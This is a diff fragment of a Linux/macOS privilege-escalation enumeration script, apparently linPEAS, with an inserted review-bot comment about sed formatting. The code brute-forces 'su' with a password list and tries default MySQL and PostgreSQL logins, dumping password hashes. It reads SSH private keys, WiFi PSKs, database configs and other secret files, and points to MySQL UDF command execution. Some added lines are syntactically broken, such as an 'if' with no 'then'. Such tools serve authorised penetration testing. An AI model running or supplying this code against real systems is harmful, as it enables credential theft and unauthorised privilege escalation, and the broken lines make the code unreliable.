"s,root,${SED_RED}," + +EXISTS_FINGER="$(command -v finger 2>/dev/null)" +if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then + dscl . list /Users | while read uname; do + ushell=$(dscl . 
-read "/Users/$uname" UserShell | cut -d " " -f2) + if grep -q "$ushell" /etc/shells; then #Shell user + finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + echo "" fi - else - print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC - fi - print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC + done +fi +echo "" + +#-- UI) Password policy +print_2title "Password policy" +grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" +echo "" + +if [ "$MACPEAS" ]; then + print_2title "Relevant last user info and user configs" + defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null echo "" + + print_2title "Guest user status" + sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi - -if echo $CHECKS | grep -q SofI; then - ########################################### - #--------) Software Information (---------# - ########################################### - print_title "Software Information" - - #-- SI) Mysql version - print_2title "MySQL version" - mysql --version 2>/dev/null || echo_not_found "mysql" - echo "" - - #-- SI) Mysql connection root/root - print_list "MySQL connection using default root/root ........... 
" - mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null) - if [ "$mysqlconnect" ]; then - echo "Yes" | sed -${E} "s,.*,${SED_RED}," - mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no +#-- UI) Brute su +EXISTS_SUDO="$(command -v sudo 2>/dev/null)" +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then + print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC + POSSIBE_SU_BRUTE=$(check_if_su_brute); + if [ "$POSSIBE_SU_BRUTE" ]; then + SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1) + printf "%s\n" "$SHELLUSERS" | while read u; do + echo " Bruteforcing user $u..." + su_brute_user_num "$u" $PASSTRY + done + else + printf $GREEN"It's not possible to brute-force su.\n\n"$NC fi +else + print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC +fi +print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC +fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi - #-- SI) Mysql connection root/toor - print_list "MySQL connection using root/toor ................... 
" - mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null) - if [ "$mysqlconnect" ]; then - echo "Yes" | sed -${E} "s,.*,${SED_RED}," - mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi +if echo $CHECKS | grep -q software_information; +print_title "Software Information" +########################################### +#--------) Software Information (---------# +########################################### - #-- SI) Mysql connection root/NOPASS - mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null) - print_list "MySQL connection using root/NOPASS ................. " - if [ "$mysqlconnectnopass" ]; then - echo "Yes" | sed -${E} "s,.*,${SED_RED}," - mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi +#-- SI) Mysql version +print_2title "MySQL version" +mysql --version 2>/dev/null || echo_not_found "mysql" +echo "" - #-- SI) Mysql credentials - print_2title "Searching mysql credentials and exec" - if [ "$PSTORAGE_MYSQL" ]; then - printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do - for f in $(find $d -name debian.cnf 2>/dev/null); do - if [ -r "$f" ]; then - echo "We can read the mysql debian.cnf. 
You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," - cat "$f" - fi - done - for f in $(find $d -name user.MYD 2>/dev/null); do - if [ -r "$f" ]; then - echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," - grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" - fi - done - for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do - if [ -r "$f" ]; then - u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null) - echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - fi - done - for f in $(find $d -name my.cnf 2>/dev/null); do - if [ -r "$f" ]; then - echo "Found readable $f" - grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," - fi - done - mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so") - if [ "$mysqlexec" ]; then - echo "Found $mysqlexec" - echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," +#-- SI) Mysql connection root/root +print_list "MySQL connection using default root/root ........... " +mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null) +if [ "$mysqlconnect" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +#-- SI) Mysql connection root/toor +print_list "MySQL connection using root/toor ................... 
" +mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null) +if [ "$mysqlconnect" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +#-- SI) Mysql connection root/NOPASS +mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null) +print_list "MySQL connection using root/NOPASS ................. " +if [ "$mysqlconnectnopass" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +#-- SI) Mysql credentials +print_2title "Searching mysql credentials and exec" +if [ "$PSTORAGE_MYSQL" ]; then + printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do + for f in $(find $d -name debian.cnf 2>/dev/null); do + if [ -r "$f" ]; then + echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," + cat "$f" fi done - else echo_not_found - fi - echo "" + for f in $(find $d -name user.MYD 2>/dev/null); do + if [ -r "$f" ]; then + echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," + grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" + fi + done + for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do + if [ -r "$f" ]; then + u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null) + echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + fi + done + for f in $(find $d -name my.cnf 2>/dev/null); do + if [ -r "$f" ]; then + echo "Found readable $f" + grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," + fi + done + mysqlexec=$(whereis lib_mysqludf_sys.so 
2>/dev/null | grep "lib_mysqludf_sys\.so") + if [ "$mysqlexec" ]; then + echo "Found $mysqlexec" + echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," + fi + done +else echo_not_found +fi +echo "" - print_2title "Analyzing MariaDB Files (limit 70)" + print_2title "Analyzing MariaDB Files (limit 70)" if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"mariadb\.cnf$\"`" ]; then echo_not_found "mariadb.cnf"; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "mariadb\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,mariadb\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"debian\.cnf$\"`" ]; then echo_not_found "debian.cnf"; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "debian\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,debian\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "user.*|password.*" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing PostgreSQL Files (limit 70)" + print_2title "Analyzing PostgreSQL Files (limit 70)" echo "Version: $(warn_exec psql -V 2>/dev/null)" if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgadmin.*\.db$\"`" ]; then echo_not_found "pgadmin*.db"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgadmin.*\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,pgadmin.*\.db$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pg_hba\.conf$\"`" ]; then echo_not_found "pg_hba.conf"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pg_hba\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pg_hba\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; 
@@ -2441,37 +2403,37 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgsql\.conf$\"`" ]; then echo_not_found "pgsql.conf"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgsql\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pgsql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; - #-- SI) PostgreSQL brute - if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. - #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this - print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " - if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ " - if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... " - if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... " - if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - echo "" +#-- SI) PostgreSQL brute +if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. 
Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. +#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this + print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " + if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no fi - print_2title "Analyzing Mongo Files (limit 70)" + print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ " + if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," + else echo_no + fi + + print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... " + if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... " + if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + echo "" +fi + + print_2title "Analyzing Mongo Files (limit 70)" echo "Version: $(warn_exec mongo --version 2>/dev/null; warn_exec mongod --version 2>/dev/null)" if ! [ "`echo \"$PSTORAGE_MONGO\" | grep -E \"mongod.*\.conf$\"`" ]; then echo_not_found "mongod*.conf"; fi; printf "%s" "$PSTORAGE_MONGO" | grep -E "mongod.*\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mongod.*\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#"; done; echo ""; - print_2title "Analyzing Apache Files (limit 70)" + print_2title "Analyzing Apache Files (limit 70)" echo "Version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)" print_3title 'PHP exec extensions' grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null 
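Review bot: The template1/postgres check still carries the malformed sed expression `sed "s,.)*,${SED_RED},"` while its three sibling checks use `sed -${E} "s,.*,${SED_RED},"`; without the extended-regex flag the pattern `.)*` matches only the first character, so the "Yes" result is not highlighted the way the other three are. Since the commit re-indents and moves this whole block anyway, aligning that line would cost nothing: `if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED},"`. The added `#checks to see if any postgres password exists ...` comment also sits at column 0 inside the `if [ "$TIMEOUT" ]` body while the statements it describes are indented one level; indenting it with them keeps the block readable. The enclosing software-information section this block belongs to starts outside the hunk.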
@@ -2480,70 +2442,70 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"php\.ini$\"`" ]; then echo_not_found "php.ini"; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "php\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,php\.ini$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E allow_ | grep -Ev "^;" | sed -${E} "s,On,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Tomcat Files (limit 70)" + print_2title "Analyzing Tomcat Files (limit 70)" if ! [ "`echo \"$PSTORAGE_TOMCAT\" | grep -E \"tomcat-users\.xml$\"`" ]; then echo_not_found "tomcat-users.xml"; fi; printf "%s" "$PSTORAGE_TOMCAT" | grep -E "tomcat-users\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,tomcat-users\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username=|password=" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; - - print_2title "Analyzing FastCGI Files (limit 70)" + + print_2title "Analyzing FastCGI Files (limit 70)" if ! [ "`echo \"$PSTORAGE_FASTCGI\" | grep -E \"fastcgi_params$\"`" ]; then echo_not_found "fastcgi_params"; fi; printf "%s" "$PSTORAGE_FASTCGI" | grep -E "fastcgi_params$" | while read f; do ls -ld "$f" | sed -${E} "s,fastcgi_params$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "DB_NAME|DB_USER|DB_PASS" | sed -${E} "s,DB_NAME|DB_USER|DB_PASS,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Http conf Files (limit 70)" + print_2title "Analyzing Http conf Files (limit 70)" if ! 
[ "`echo \"$PSTORAGE_HTTP_CONF\" | grep -E \"httpd\.conf$\"`" ]; then echo_not_found "httpd.conf"; fi; printf "%s" "$PSTORAGE_HTTP_CONF" | grep -E "httpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,httpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "htaccess.*|htpasswd.*" | grep -Ev "\W+\#|^#" | sed -${E} "s,htaccess.*|htpasswd.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Htpasswd Files (limit 70)" + print_2title "Analyzing Htpasswd Files (limit 70)" if ! [ "`echo \"$PSTORAGE_HTPASSWD\" | grep -E \"\.htpasswd$\"`" ]; then echo_not_found ".htpasswd"; fi; printf "%s" "$PSTORAGE_HTPASSWD" | grep -E "\.htpasswd$" | while read f; do ls -ld "$f" | sed -${E} "s,\.htpasswd$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing PHP Sessions Files (limit 70)" + print_2title "Analyzing PHP Sessions Files (limit 70)" ls /var/lib/php/sessions 2>/dev/null || echo_not_found /var/lib/php/sessions if ! [ "`echo \"$PSTORAGE_PHP_SESSIONS\" | grep -E \"sess_.*$\"`" ]; then echo_not_found "sess_*"; fi; printf "%s" "$PSTORAGE_PHP_SESSIONS" | grep -E "sess_.*$" | while read f; do ls -ld "$f" | sed -${E} "s,sess_.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - print_2title "Analyzing Wordpress Files (limit 70)" + print_2title "Analyzing Wordpress Files (limit 70)" if ! [ "`echo \"$PSTORAGE_WORDPRESS\" | grep -E \"wp-config\.php$\"`" ]; then echo_not_found "wp-config.php"; fi; printf "%s" "$PSTORAGE_WORDPRESS" | grep -E "wp-config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,wp-config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "PASSWORD|USER|NAME|HOST" | sed -${E} "s,PASSWORD|USER|NAME|HOST,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Drupal Files (limit 70)" + print_2title "Analyzing Drupal Files (limit 70)" if ! 
[ "`echo \"$PSTORAGE_DRUPAL\" | grep -E \"settings\.php$\"`" ]; then echo_not_found "settings.php"; fi; printf "%s" "$PSTORAGE_DRUPAL" | grep -E "settings\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,settings\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix'" | sed -${E} "s,drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix',${SED_RED},g"; done; echo ""; - print_2title "Analyzing Moodle Files (limit 70)" + print_2title "Analyzing Moodle Files (limit 70)" if ! [ "`echo \"$PSTORAGE_MOODLE\" | grep -E \"config\.php$\"`" ]; then echo_not_found "config.php"; fi; printf "%s" "$PSTORAGE_MOODLE" | grep -E "config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "dbtype|dbhost|dbuser|dbhost|dbpass|dbport" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Supervisord Files (limit 70)" + print_2title "Analyzing Supervisord Files (limit 70)" if ! [ "`echo \"$PSTORAGE_SUPERVISORD\" | grep -E \"supervisord\.conf$\"`" ]; then echo_not_found "supervisord.conf"; fi; printf "%s" "$PSTORAGE_SUPERVISORD" | grep -E "supervisord\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,supervisord\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "port.*=|username.*=|password.*=" | sed -${E} "s,port.*=|username.*=|password.*=,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Cesi Files (limit 70)" + print_2title "Analyzing Cesi Files (limit 70)" if ! 
[ "`echo \"$PSTORAGE_CESI\" | grep -E \"cesi\.conf$\"`" ]; then echo_not_found "cesi.conf"; fi; printf "%s" "$PSTORAGE_CESI" | grep -E "cesi\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,cesi\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username.*=|password.*=|host.*=|port.*=|database.*=" | sed -${E} "s,username.*=|password.*=|host.*=|port.*=|database.*=,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Rsync Files (limit 70)" + print_2title "Analyzing Rsync Files (limit 70)" if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.conf$\"`" ]; then echo_not_found "rsyncd.conf"; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,secrets.*|auth.*users.*=,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.secrets$\"`" ]; then echo_not_found "rsyncd.secrets"; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Hostapd Files (limit 70)" + print_2title "Analyzing Hostapd Files (limit 70)" if ! 
[ "`echo \"$PSTORAGE_HOSTAPD\" | grep -E \"hostapd\.conf$\"`" ]; then echo_not_found "hostapd.conf"; fi; printf "%s" "$PSTORAGE_HOSTAPD" | grep -E "hostapd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,hostapd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,passphrase.*,${SED_RED},g"; done; echo ""; - #-- SI) Wifi conns - print_2title "Searching wifi conns file" - wifi=$(find /etc/NetworkManager/system-connections/ -type f 2>/dev/null) - if [ "$wifi" ]; then - printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${SED_RED},"; done - else echo_not_found - fi - echo "" +#-- SI) Wifi conns +print_2title "Searching wifi conns file" +wifi=$(find /etc/NetworkManager/system-connections/ -type f 2>/dev/null) +if [ "$wifi" ]; then + printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${SED_RED},"; done +else echo_not_found +fi +echo "" - print_2title "Analyzing Anaconda ks Files (limit 70)" + print_2title "Analyzing Anaconda ks Files (limit 70)" if ! [ "`echo \"$PSTORAGE_ANACONDA_KS\" | grep -E \"anaconda-ks\.cfg$\"`" ]; then echo_not_found "anaconda-ks.cfg"; fi; printf "%s" "$PSTORAGE_ANACONDA_KS" | grep -E "anaconda-ks\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,anaconda-ks\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rootpw.*" | sed -${E} "s,rootpw.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing VNC Files (limit 70)" + print_2title "Analyzing VNC Files (limit 70)" if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"\.vnc$\"`" ]; then echo_not_found ".vnc"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "\.vnc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.vnc$,${SED_RED},"; for ff in $(find "$f" -name "passwd"); do ls -ld "$ff" | sed -${E} "s,passwd,${SED_RED},"; done; echo "";done; echo ""; if ! 
[ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.c.*nf.*$\"`" ]; then echo_not_found "*vnc*.c*nf*"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.c.*nf.*$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.c.*nf.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.ini$\"`" ]; then echo_not_found "*vnc*.ini"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.ini$,${SED_RED},"; done; echo ""; 
@@ -2551,23 +2513,23 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.xml$\"`" ]; then echo_not_found "*vnc*.xml"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Ldap Files (limit 70)" + print_2title "Analyzing Ldap Files (limit 70)" echo "The password hash is from the {SSHA} to 'structural'" if ! [ "`echo \"$PSTORAGE_LDAP\" | grep -E \"ldap$\"`" ]; then echo_not_found "ldap"; fi; printf "%s" "$PSTORAGE_LDAP" | grep -E "ldap$" | while read f; do ls -ld "$f" | sed -${E} "s,ldap$,${SED_RED},"; for ff in $(find "$f" -name "*.bdb"); do ls -ld "$ff" | sed -${E} "s,.bdb,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E -i -a -o "description.*" | sort | uniq | sed -${E} "s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analyzing OpenVPN Files (limit 70)" + print_2title "Analyzing OpenVPN Files (limit 70)" if ! 
[ "`echo \"$PSTORAGE_OPENVPN\" | grep -E \"\.ovpn$\"`" ]; then echo_not_found "*.ovpn"; fi; printf "%s" "$PSTORAGE_OPENVPN" | grep -E "\.ovpn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ovpn$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "auth-user-pass.+" | sed -${E} "s,auth-user-pass.+,${SED_RED},g"; done; echo ""; - #-- SI) ssh files - print_2title "Searching ssl/ssh files" - if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi - sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" - hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" - hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" +#-- SI) ssh files +print_2title "Searching ssl/ssh files" +if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi +sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" +hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" +hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" - print_2title "Analyzing SSH Files (limit 70)" + print_2title "Analyzing SSH Files (limit 70)" if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_dsa.*$\"`" ]; then echo_not_found "id_dsa*"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_dsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_dsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_rsa.*$\"`" ]; then echo_not_found "id_rsa*"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_rsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_rsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"known_hosts$\"`" ]; then echo_not_found "known_hosts"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "known_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,known_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 
